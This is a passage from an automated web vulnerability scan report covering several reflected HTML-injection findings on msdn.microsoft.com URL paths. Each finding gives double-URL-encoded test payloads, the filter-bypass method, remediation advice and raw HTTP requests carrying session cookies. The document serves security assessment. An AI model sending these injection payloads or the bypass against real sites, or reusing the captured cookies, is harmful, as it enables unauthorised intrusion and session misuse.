17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us34672"><a>13af3ebde69/library/ms691105(VS.85)" />
...[SNIP]...

2.127. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcffb%2522%253e%253ca%253e734127f3eb7 was submitted in the REST URL parameter 2. This input was echoed as fcffb"><a>734127f3eb7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryfcffb%2522%253e%253ca%253e734127f3eb7/ms691105(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9213
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryfcffb"><a>734127f3eb7/ms691105(VS.85)" />
...[SNIP]...

2.128. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 676ce%2522%253e%253ca%253e1ab5e936dbc was submitted in the REST URL parameter 3. This input was echoed as 676ce"><a>1ab5e936dbc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms691105(VS.85).aspx676ce%2522%253e%253ca%253e1ab5e936dbc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms691105(VS.85).aspx676ce"><a>1ab5e936dbc" />
...[SNIP]...

2.129. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389b8%2522%253e%253ca%253e0c832b23844 was submitted in the REST URL parameter 1. This input was echoed as 389b8"><a>0c832b23844 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us389b8%2522%253e%253ca%253e0c832b23844/library/ms951681.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:03 GMT
Content-Length: 9174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us389b8"><a>0c832b23844/library/ms951681" />
...[SNIP]...

2.130. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27641%2522%253e%253ca%253ec797046cb99 was submitted in the REST URL parameter 2. This input was echoed as 27641"><a>c797046cb99 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library27641%2522%253e%253ca%253ec797046cb99/ms951681.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:35 GMT
Content-Length: 9174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library27641"><a>c797046cb99/ms951681" />
...[SNIP]...

2.131. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff27%2522%253e%253ca%253e96af2b045ba was submitted in the REST URL parameter 3. This input was echoed as aff27"><a>96af2b045ba in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms951681.aspxaff27%2522%253e%253ca%253e96af2b045ba HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 